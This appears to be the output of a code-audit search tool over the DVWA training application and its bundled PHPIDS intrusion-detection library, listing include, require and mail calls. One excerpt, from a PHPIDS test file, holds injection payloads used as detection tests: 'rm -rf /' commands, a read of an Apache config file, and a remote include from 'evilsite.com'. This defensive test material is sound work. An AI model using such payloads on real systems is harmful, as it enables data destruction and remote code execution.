23-    . '../../lib/'
24-);
./external/phpids/0.6/docs/examples/cakephp/ids.php:99 (25/70) OK | Dubious | Bad | Hide
96-    private $init = NULL;
97-
98-    /**
99:     * This function includes the IDS vendor parts and runs the
100-     * detection routines on the request array.
101-     *
102-     * @param object cake controller object
./external/phpids/0.6/docs/examples/cakephp/ids.php:110 (26/70) OK | Dubious | Bad | Hide
107-        $this->controller = &$controller;
108-        $this->name = Inflector::singularize($this->controller->name);
109-
110:        #set include path for IDS  and store old one
111:        $path = get_include_path();
112:        set_include_path( VENDORS . 'phpids/');
113-
114-        #require the needed files
115-        vendor('phpids/IDS/Init');
./external/phpids/0.6/docs/examples/cakephp/ids.php:128 (27/70) OK | Dubious | Bad | Hide
125-        $ids        = new IDS_Monitor($this->init, $_REQUEST);
126-        $result     = $ids->run();
127-
128:        // Re-set include path
129:        set_include_path($path);
130-
131-        if (!$result->isEmpty()) {
132-            $this->react($result);
./external/phpids/0.6/tests/IDS/ReportTest.php:23 (28/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Report.php';
25-require_once 'IDS/Event.php';
26-
./external/phpids/0.6/tests/IDS/MonitorTest.php:22 (29/70) OK | Dubious | Bad | Hide
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-require_once 'PHPUnit/Framework/TestCase.php';
22:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23-require_once 'IDS/Monitor.php';
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Filter/Storage.php';
./external/phpids/0.6/tests/IDS/MonitorTest.php:1015 (30/70) OK | Dubious | Bad | Hide
1012-        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013-        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014-        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015:        $exploits[] = '; include "http://evilsite.com/evilcode"';
1016-        $exploits[] = '; rm -rf /\0';
1017-        $exploits[] = '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="';
1018-        $exploits[] = '";
./external/phpids/0.6/tests/IDS/EventTest.php:23 (31/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Event.php';
25-require_once 'IDS/Filter.php';
26-
./external/phpids/0.6/tests/IDS/ExceptionTest.php:23 (32/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Caching/Factory.php';
26-require_once 'IDS/Report.php';
./external/phpids/0.6/tests/IDS/FilterTest.php:23 (33/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
./external/phpids/0.6/tests/IDS/InitTest.php:23 (34/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
./external/phpids/0.6/tests/IDS/CachingTest.php:23 (35/70) OK | Dubious | Bad | Hide
20- */
21-
22-require_once 'PHPUnit/Framework/TestCase.php';
23:set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24-require_once 'IDS/Init.php';
25-require_once 'IDS/Caching/Factory.php';
26-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:105 (36/70) OK | Dubious | Bad | Hide
102-
103-            if ($caching && $caching != 'none') {
104-                $this->cacheSettings = $init->config['Caching'];
105:                include_once 'IDS/Caching/Factory.php';
106-                $this->cache = IDS_Caching::factory($init, 'storage');
107-            }
108-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:233 (37/70) OK | Dubious | Bad | Hide
230-            $nocache = $filters instanceof SimpleXMLElement;
231-            $filters = $nocache ? $filters->filter : $filters;
232-
233:            include_once 'IDS/Filter.php';
234-
235-            foreach ($filters as $filter) {
236-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:328 (38/70) OK | Dubious | Bad | Hide
325-            $nocache = !is_array($filters);
326-            $filters = $nocache ? $filters->filters->filter : $filters;
327-
328:            include_once 'IDS/Filter.php';
329-
330-            foreach ($filters as $filter) {
331-
./external/phpids/0.6/lib/IDS/Caching/Factory.php:76 (39/70) OK | Dubious | Bad | Hide
73-            $wrapper . '.php';
74-
75-        if (file_exists($path)) {
76:            include_once $path;
77-
78-            if (class_exists($class)) {
79-                $object = call_user_func(array($class, 'getInstance'),
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:13 (40/70) OK | Dubious | Bad | Hide
10- *      sample usage.
11- * 
12- * @note
13: *      This filter can also be used on stylesheets not included in the
14- *      document--something purists would probably prefer. Just directly
15- *      call HTMLPurifier_Filter_ExtractStyleBlocks->cleanCSS()
16- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:80 (41/70) OK | Dubious | Bad | Hide
77-                            HTML Purifier autoloader registrar is not compatible
78-                            with non-static object methods due to PHP Bug #44144;
79-                            Please do not use HTMLPurifier.autoload.php (or any
80:                            file that includes this file); instead, place the code:
81-                            spl_autoload_register(array(\'HTMLPurifier_Bootstrap\', \'autoload\'))
82-                            after your own autoloaders.
83-                        ');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:50 (42/70) OK | Dubious | Bad | Hide
47-permit persons to whom the Software is furnished to do so, subject to 
48-the following conditions: 
49-
50:The above copyright notice and this permission notice shall be included 
51-in all copies or substantial portions of the Software. 
52-
53-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:114 (43/70) OK | Dubious | Bad | Hide
111-        // later keys takes precedence
112-        foreach($def->attr as $k => $v) {
113-            if ($k === 0) {
114:                // merge in the includes
115:                // sorry, no way to override an include
116-                foreach ($v as $v2) {
117-                    $this->attr[0][] = $v2;
118-                }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:31 (44/70) OK | Dubious | Bad | Hide
28-                }
29-                foreach ($coll as $attr_i => $attr) {
30-                    if ($attr_i === 0 && isset($this->info[$coll_i][$attr_i])) {
31:                        // merge in includes
32-                        $this->info[$coll_i][$attr_i] = array_merge(
33-                            $this->info[$coll_i][$attr_i], $attr);
34-                        continue;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:42 (45/70) OK | Dubious | Bad | Hide
39-        }
40-        // perform internal expansions and inclusions
41-        foreach ($this->info as $name => $attr) {
42:            // merge attribute collections that include others
43-            $this->performInclusions($this->info[$name]);
44-            // replace string identifiers with actual attribute objects
45-            $this->expandIdentifiers($this->info[$name], $attr_types);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URISchemeRegistry.php:41 (46/70) OK | Dubious | Bad | Hide
38-        if (!$config) $config = HTMLPurifier_Config::createDefault();
39-        $null = null; // for the sake of passing by reference
40-        
41:        // important, otherwise attacker could include arbitrary file
42-        $allowed_schemes = $config->get('URI', 'AllowedSchemes');
43-        if (!$config->get('URI', 'OverrideAllowedSchemes') &&
44-            !isset($allowed_schemes[$scheme])
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php:26 (47/70) OK | Dubious | Bad | Hide
23-            new HTMLPurifier_AttrTransform_EnumToCSS('align', array(
24-                // we're following IE's behavior, not Firefox's, due
25-                // to the fact that no one supports caption-side:right,
26:                // W3C included (with CSS 2.1). This is a slightly
27-                // unreasonable attribute!
28-                'left'   => 'text-align:left;',
29-                'right'  => 'text-align:right;',
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:142 (48/70) OK | Dubious | Bad | Hide
139-     *          - Check for literal object name
140-     *          - Throw fatal error
141-     *       If your object name collides with an internal class, specify
142:     *       your module manually. All modules must have been included
143-     *       externally: registerModule will not perform inclusions for you!
144-     */
145-    public function registerModule($module, $overload = false) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:147 (49/70) OK | Dubious | Bad | Hide
144-        // generate filename
145-        $filename = $this->dir . '/Language/messages/' . $code . '.php';
146-        
147:        // default fallback : may be overwritten by the ensuing include
148-        $fallback = ($code != 'en') ? 'en' : false;
149-        
150-        // load primary localisation
151-        if (!file_exists($filename)) {
152:            // skip the include: will rely solely on fallback
153-            $filename = $this->dir . '/Language/messages/en.php';
154-            $cache = array();
155-        } else {
156:            include $filename;
157-            $cache = compact($this->keys);
158-        }
159-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:14 (50/70) OK | Dubious | Bad | Hide
11- * @note The public variables in a module should almost directly
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14: *       objects (include it anyway if that's the correspondence though).
15- * @todo Consider making some member functions protected
16- */
17-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:123 (51/70) OK | Dubious | Bad | Hide
120-     *              Set as false to skip this step.
121-     * @param $contents Allowed children in form of:
122-     *              "$content_model_type: $content_model"
123:     * @param $attr_includes What attribute collections to register to
124-     *              element?
125-     * @param $attr What unique attributes does the element define?
126-     * @note See ElementDef for in-depth descriptions of these parameters.
127-     * @return Created element definition object, so you 
128-     *         can set advanced parameters
129-     */
130:    public function addElement($element, $type, $contents, $attr_includes = array(), $attr = array()) {
131-        $this->elements[] = $element;
132-        // parse content_model
133-        list($content_model_type, $content_model) = $this->parseContents($contents);
134-        // merge in attribute inclusions
135:        $this->mergeInAttrIncludes($attr, $attr_includes);
136-        // add element to content sets
137-        if ($type) $this->addElementToContentSet($element, $type);
138-        // create element
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:203 (52/70) OK | Dubious | Bad | Hide
200-    }
201-    
202-    /**
203:     * Convenience function that merges a list of attribute includes into
204-     * an attribute array.
205-     * @param $attr Reference to attr array to modify
206:     * @param $attr_includes Array of includes / string include to merge in
207-     */
208:    public function mergeInAttrIncludes(&$attr, $attr_includes) {
209:        if (!is_array($attr_includes)) {
210:            if (empty($attr_includes)) $attr_includes = array();
211:            else $attr_includes = array($attr_includes);
212-        }
213:        $attr[0] = $attr_includes;
214-    }
215-    
216-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:143 (53/70) OK | Dubious | Bad | Hide
140-    
141-    /**
142-     * Generates attribute declarations from attribute array.
143:     * @note This does not include the leading or trailing space.
144-     * @param $assoc_array_of_attributes Attribute array
145-     * @param $element Name of element attributes are for, used to check
146-     *        attribute minimization.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.path.php:9 (54/70) OK | Dubious | Bad | Hide
6- * without any other side-effects.
7- */
8-
9:set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:5 (55/70) OK | Dubious | Bad | Hide
2-
3-/**
4- * @file
5: * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. Use this if performance is a
7- * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS
8- * FILE, changes will be overwritten the next time the script is run.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:13 (56/70) OK | Dubious | Bad | Hide
10- * @version 3.2.0
11- * 
12- * @warning
13: *      You must *not* include any other HTML Purifier files before this file,
14- *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17: *      This file requires that the include path contains the HTML Purifier
18- *      library directory; this is not auto-set.
19- */
20-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:5 (57/70) OK | Dubious | Bad | Hide
2-
3-/**
4- * @file
5: * This file was auto-generated by generate-includes.php and includes all of
6- * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10: * Changes to include_path are not necessary.
11- */
12-
13-$__dir = dirname(__FILE__);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:4 (58/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * This is a stub include that automatically configures the include path.
5- */
6-
7:set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8-require_once 'HTMLPurifier/Bootstrap.php';
9-require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Monitor.php:224 (59/70) OK | Dubious | Bad | Hide
221-            );
222-        }
223-
224:        include_once 'IDS/Report.php';
225-        $this->report = new IDS_Report;
226-    }
227-
./external/phpids/0.6/lib/IDS/Monitor.php:260 (60/70) OK | Dubious | Bad | Hide
257-            if (is_string($value)) {
258-
259-                if ($filter = $this->_detect($key, $value)) {
260:                    include_once 'IDS/Event.php';
261-                    $this->report->addEvent(
262-                        new IDS_Event(
263-                            $key,
./external/phpids/0.6/lib/IDS/Monitor.php:317 (61/70) OK | Dubious | Bad | Hide
314-        }
315-
316-        // use the converter
317:        include_once 'IDS/Converter.php';
318-        $value = IDS_Converter::runAll($value);
319-        $value = IDS_Converter::runCentrifuge($value, $this);
320-
./external/phpids/0.6/lib/IDS/Monitor.php:368 (62/70) OK | Dubious | Bad | Hide
365-     */
366-    private function _purifyValues($key, $value) {
367-
368:        include_once $this->pathToHTMLPurifier;
369-
370-        if (!is_writeable($this->HTMLPurifierCache)) {
371-            throw new Exception(
./external/phpids/0.6/lib/IDS/Init.php:87 (63/70) OK | Dubious | Bad | Hide
84-     */
85-    private function __construct($configPath = null) 
86-    {
87:        include_once 'IDS/Monitor.php';
88:        include_once 'IDS/Filter/Storage.php';
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
./external/phpids/0.6/lib/IDS/Report.php:96 (64/70) OK | Dubious | Bad | Hide
93-    /**
94-     * Constructor
95-     *
96:     * @param array $events the events the report should include
97-     *
98-     * @return void
99-     */
./setup.php:4 (65/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./setup.php:15 (66/70) OK | Dubious | Bad | Hide
12-if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
16-	}
17-	elseif ($DBMS == 'PGSQL') {
18:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21-		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );
./phpinfo.php:3 (67/70) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:241 (68/70) OK | Dubious | Bad | Hide
238-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'brute', 'name' => 'Brute Force', 'url' => 'vulnerabilities/brute/.' );
239-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'exec', 'name' => 'Command Execution', 'url' => 'vulnerabilities/exec/.' );
240-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'csrf', 'name' => 'CSRF', 'url' => 'vulnerabilities/csrf/.' );
241:	$menuBlocks['vulnerabilities'][] = array( 'id' => 'fi', 'name' => 'File Inclusion', 'url' => 'vulnerabilities/fi/.?page=include.php' );
242-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'sqli', 'name' => 'SQL Injection', 'url' => 'vulnerabilities/sqli/.' );
243-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'sqli_blind', 'name' => 'SQL Injection (Blind)', 'url' => 'vulnerabilities/sqli_blind/.' );
244-	$menuBlocks['vulnerabilities'][] = array( 'id' => 'upload', 'name' => 'Upload', 'url' => 'vulnerabilities/upload/.' );
./dvwa/includes/dvwaPhpIds.inc.php:11 (69/70) OK | Dubious | Bad | Hide
8-define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/'.dvwaPhpIdsVersionGet().'/' );
9-define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS );
10-
11:// Add PHPIDS to include path
12:set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14-require_once 'IDS/Init.php';
15-
./logout.php:4 (70/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

include_once (10) Top | Hide

./external/phpids/0.6/lib/IDS/Filter/Storage.php:105 (1/10) OK | Dubious | Bad | Hide
103-            if ($caching && $caching != 'none') {
104-                $this->cacheSettings = $init->config['Caching'];
105:                include_once 'IDS/Caching/Factory.php';
106-                $this->cache = IDS_Caching::factory($init, 'storage');
107-            }
108-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:233 (2/10) OK | Dubious | Bad | Hide
230-            $nocache = $filters instanceof SimpleXMLElement;
231-            $filters = $nocache ? $filters->filter : $filters;
232-
233:            include_once 'IDS/Filter.php';
234-
235-            foreach ($filters as $filter) {
236-
./external/phpids/0.6/lib/IDS/Filter/Storage.php:328 (3/10) OK | Dubious | Bad | Hide
325-            $nocache = !is_array($filters);
326-            $filters = $nocache ? $filters->filters->filter : $filters;
327-
328:            include_once 'IDS/Filter.php';
329-
330-            foreach ($filters as $filter) {
331-
./external/phpids/0.6/lib/IDS/Caching/Factory.php:76 (4/10) OK | Dubious | Bad | Hide
73-            $wrapper . '.php';
74-
75-        if (file_exists($path)) {
76:            include_once $path;
77-
78-            if (class_exists($class)) {
79-                $object = call_user_func(array($class, 'getInstance'),
./external/phpids/0.6/lib/IDS/Monitor.php:224 (5/10) OK | Dubious | Bad | Hide
221-            );
222-        }
223-
224:        include_once 'IDS/Report.php';
225-        $this->report = new IDS_Report;
226-    }
227-
./external/phpids/0.6/lib/IDS/Monitor.php:260 (6/10) OK | Dubious | Bad | Hide
257-            if (is_string($value)) {
258-
259-                if ($filter = $this->_detect($key, $value)) {
260:                    include_once 'IDS/Event.php';
261-                    $this->report->addEvent(
262-                        new IDS_Event(
263-                            $key,
./external/phpids/0.6/lib/IDS/Monitor.php:317 (7/10) OK | Dubious | Bad | Hide
314-        }
315-
316-        // use the converter
317:        include_once 'IDS/Converter.php';
318-        $value = IDS_Converter::runAll($value);
319-        $value = IDS_Converter::runCentrifuge($value, $this);
320-
./external/phpids/0.6/lib/IDS/Monitor.php:368 (8/10) OK | Dubious | Bad | Hide
365-     */
366-    private function _purifyValues($key, $value) {
367-
368:        include_once $this->pathToHTMLPurifier;
369-
370-        if (!is_writeable($this->HTMLPurifierCache)) {
371-            throw new Exception(
./external/phpids/0.6/lib/IDS/Init.php:87 (9/10) OK | Dubious | Bad | Hide
84-     */
85-    private function __construct($configPath = null) 
86-    {
87:        include_once 'IDS/Monitor.php';
88:        include_once 'IDS/Filter/Storage.php';
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
./setup.php:15 (10/10) OK | Dubious | Bad | Hide
12-if( isset( $_POST[ 'create_db' ] ) ) {
13-
14-	if ($DBMS == 'MySQL') {
15:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/MySQL.php';
16-	}
17-	elseif ($DBMS == 'PGSQL') {
18:		include_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/DBMS/PGSQL.php';
19-	}
20-	else {
21-		dvwaMessagePush( "ERROR: Invalid database selected. Please review the config file syntax." );

mail( (4) Top | Hide

./external/phpids/0.6/docs/examples/cakephp/ids.php:160 (1/4) OK | Dubious | Bad | Hide
158-        if ($impact >= $this->threshold['kick']) {
159-            $this->idslog($result, 3, $impact);
160:            $this->idsmail($result);
161-            $this->idskick($result);
162-            return true;
163-        } else if ($impact >= $this->threshold['warn']) {
164-            $this->idslog($result, 2, $impact);
165:            $this->idsmail($result);
166-            $this->idswarn($result);
167-            return true;
168-        } else if ($impact >= $this->threshold['mail']) {
169-            $this->idslog($result, 1, $impact);
170:            $this->idsmail($result);
171-            return true;
172-        } else if ($impact >= $this->threshold['log']) {
173-            $this->idslog($result, 0, $impact);
./external/phpids/0.6/docs/examples/cakephp/ids.php:230 (2/4) OK | Dubious | Bad | Hide
227-     * @param array $results
228-     * @return boolean
229-     */
230:    private function idsmail($result) {
231-
232-        vendor('phpids/IDS/Log/Email.php');
233-        vendor('phpids/IDS/Log/Composite.php');
./external/phpids/0.6/lib/IDS/Log/Email.php:185 (3/4) OK | Dubious | Bad | Hide
182-    public static function getInstance($config)
183-    {
184-        if (!self::$instance) {
185:            self::$instance = new IDS_Log_Email($config);
186-        }
187-
188-        return self::$instance;
./external/phpids/0.6/lib/IDS/Log/Email.php:381 (4/4) OK | Dubious | Bad | Hide
378-    protected function send($address, $data, $headers, $envelope = null)
379-    {
380-        if (!$envelope || strpos(ini_get('sendmail_path'),' -f') !== false) {
381:            return mail($address,
382-                $this->subject,
383-                $data,
384-                $headers);
385-        } else {
386:            return mail($address,
387-                $this->subject,
388-                $data,
389-                $headers,

require (99) Top | Hide

./instructions.php:4 (1/99) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/99) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/99) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./security.php:4 (6/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (7/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:30 (8/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/csrf/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'csrf';
33-$page[ 'source_button' ] = 'csrf';
./vulnerabilities/fi/index.php:4 (9/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:30 (10/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/fi/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
./vulnerabilities/sqli_blind/index.php:4 (11/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli_blind/index.php:30 (12/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli_blind/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli_blind';
33-$page[ 'source_button' ] = 'sqli_blind';
./vulnerabilities/view_source.php:4 (13/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (14/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:30 (15/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/brute/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'brute';
33-$page[ 'source_button' ] = 'brute';
./vulnerabilities/exec/index.php:4 (16/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/exec/index.php:30 (17/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/exec/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'exec';
33-$page[ 'source_button' ] = 'exec';
./vulnerabilities/upload/index.php:4 (18/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/upload/index.php:30 (19/99) OK | Dubious | Bad | Hide
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/upload/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'upload';
33-$page[ 'source_button' ] = 'upload';
./vulnerabilities/view_help.php:4 (20/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (21/99) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
